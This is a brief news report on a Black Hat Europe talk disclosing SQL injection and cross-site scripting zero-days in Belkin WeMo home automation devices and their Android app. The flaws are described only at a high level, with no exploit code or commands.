SQLi, XSS zero-days expose Belkin IoT devices, Android smartphones

LONDON, UK – Research director Scott Tenaglia and lead research engineer Joe Tanen detailed the vulnerabilities during their ‘Breaking BHAD: Abusing Belkin Home Automation devices’ talk at the Black Hat Europe conference in London last Friday.

The zero-day flaws specifically relate to Belkin’s smart home products and accompanying Android mobile application, which is used to wirelessly control the home automation devices.

The first flaw, a SQL injection vulnerability, enables would-be hackers to inject malicious code into the paired Android WeMo smartphone app, and thus take root control of the connected home automation device.

The second flaw, the one directly affecting the WeMo Android app, is a cross-site scripting (XSS) issue, allowing an attacker with network access to execute arbitrary JavaScript code in the Android application, a fault that can lead to hijacking the phone and stealing sensitive, personal data.

To read this article in full or to leave a comment, please click here